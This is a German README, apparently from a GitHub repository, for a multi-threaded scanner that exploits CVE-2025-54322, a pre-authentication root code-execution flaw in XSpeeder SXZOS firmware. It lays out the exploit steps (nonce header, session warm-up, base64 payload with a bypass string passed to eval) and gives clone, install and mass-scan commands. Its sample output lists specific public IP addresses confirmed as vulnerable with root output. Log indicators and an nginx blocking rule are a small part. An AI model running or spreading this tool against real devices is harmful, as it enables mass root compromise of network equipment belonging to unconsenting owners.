
CVE-2025-54322 - XSpeeder SXZOS Pre-Auth RCE 0day-Schnellfinder
Ein multi-threaded Schwachstellenscanner für CVE-2025-54322, eine nicht authentifizierte Remote-Code-Ausführungssicherheitslücke in der XSpeeder SXZOS-Firmware, die weltweit etwa 70.000+ Hosts betrifft.
CVE-2025-54322 ist eine kritische Pre-Authentifizierungs-Remote-Code-Ausführungssicherheitslücke, die in der XSpeeder SXZOS-Firmware entdeckt wurde, die SD-WAN-Geräte, Router und Edge-Netzwerkausrüstung antreibt.
Die Schwachstelle befindet sich in der Django-basierten Weboberfläche der SXZOS-Firmware:
/?title=ABC&oIp=XXX&chkid=[base64_payload]eval() auf base64-dekodierten Benutzereingaben1. Berechne zeitbasiertes Nonce für X-SXZ-R-Header
2. Wärme Session über Endpunkt /webInfos/ auf
3. Erstelle schädliche Nutzlast mit Umgehungsstring (#sUserCodexsPwd)
4. Base64-kodiere Nutzlast
5. Sende Exploit mit genau 3 Query-Parametern
6. Server dekodiert und wertet Nutzlast aus
7. Befehle werden mit Root-Rechten ausgeführt
Der Exploit umgeht mehrere Verteidigungsschichten:
SXZ/2.3X-SXZ-R: [0-6]/webInfos/#sUserCodexsPwd-Kommentarvuln-confirm.txt# Repository klonen
git clone https://github.com/Sachinart/CVE-2025-54322.git
cd CVE-2025-54322
# Erforderliche Abhängigkeiten installieren
pip install -r requirements.txt
Erstellen Sie eine requirements.txt-Datei:
requests>=2.31.0
urllib3>=2.0.0
python3 scanner.py targets.txt
# Mit benutzerdefinierter Thread-Anzahl scannen (Standard: 10)
python3 scanner.py targets.txt 20
# Mit maximaler Thread-Anzahl für schnellere Ergebnisse scannen
python3 scanner.py targets.txt 50
# Mit konservativer Thread-Anzahl scannen
python3 scanner.py targets.txt 5
Erstellen Sie eine targets.txt-Datei mit einem Ziel pro Zeile:
https://192.168.1.100:4433
https://10.0.0.50:8443
https://example.com:4433
http://vulnerable-device.local
$ python3 scanner.py targets.txt 20
╔═══════════════════════════════════════════════════════════════╗
║ XSpeeder SXZOS (CVE-2025-54322) RCE Scanner ║
║ Pre-Auth Root RCE Vulnerability Checker ║
║ Showing: VULNERABLE HOSTS ONLY ║
╚═══════════════════════════════════════════════════════════════╝
[*] Loaded 2338 targets from targets.txt
[*] Using 20 concurrent threads
[*] Vulnerable hosts will be saved to: vuln-confirm.txt
[*] Starting scan...
======================================================================
[+] VULNERABLE: https://27.40.80.93:4433
[+] Status: VULNERABLE - RCE Confirmed
[+] HTTP Status: 500
[+] Output: uid=0(root) gid=0(root)
======================================================================
[*] Progress: 50/2338 | Found: 12 vulnerable
[*] Progress: 100/2338 | Found: 24 vulnerable
======================================================================
[*] SCAN COMPLETE
======================================================================
[*] Total Time: 890.45 seconds
[*] Total Targets Scanned: 2338
[*] Vulnerable Hosts Found: 156
[*] Success Rate: 6.67%
======================================================================
Der Scanner zeigt an:
vuln-confirm.txt)XSpeeder SXZOS CVE-2025-54322 - Vulnerable Hosts
Scan started: 2025-12-27 15:30:45
======================================================================
https://27.40.80.93:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
https://27.40.83.189:4433
Status: VULNERABLE - RCE Confirmed
Output: uid=0(root) gid=0(root)
----------------------------------------------------------------------
======================================================================
Scan completed: 2025-12-27 15:45:30
Total scanned: 2338
Vulnerable: 156
Time taken: 890.45 seconds
Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.
Wenn Sie anfällige Systeme entdecken:
Wenn Sie XSpeeder SXZOS-Geräte verwalten:
Achten Sie auf diese Indikatoren in Protokollen:
/?title=*&oIp=*&chkid=* mit base64-NutzlastenSXZ/2.3X-SXZ-R-Header#sUserCodexsPwd enthalten/webInfos/ gefolgt vom Wurzelpfad# Nginx-Regel zur Blockierung von Exploit-Versuchen
location / {
if ($args ~* "chkid=") {
return 403;
}
}
Diese Schwachstelle wurde autonom von pwn.ai entdeckt – einer KI-gestützten Sicherheitsforschungsplattform.
Wichtiger Hinweis: Dies ist der erste öffentlich dokumentierte agenten-gefundene, remote ausnutzbare Zero-Day-RCE.
Chirag Artani
Diese Scanner-Implementierung wurde erstellt, um Sicherheitsexperten zu unterstützen bei:
Dieses Projekt ist unter der MIT-Lizenz lizenziert – siehe LICENSE-Datei für Details.
Beiträge sind willkommen! Bitte reichen Sie einen Pull Request ein.
Bei Fragen, Problemen oder Vorschlägen:
Denken Sie daran: Mit großer Macht kommt große Verantwortung. Verwenden Sie dieses Tool ethisch und legal.
Bleiben Sie sicher. Bleiben Sie ethisch. Bleiben Sie legal.
| Zielanzahl | Empfohlene Threads | Erwartete Zeit |
|---|
| 1-10 | 5 Threads | ~1-2 Min |
| 10-50 | 10 Threads | ~3-5 Min |
| 50-100 | 20 Threads | ~5-10 Min |
| 100-500 | 30 Threads | ~10-20 Min |
| 500+ | 40-50 Threads | ~20+ Min |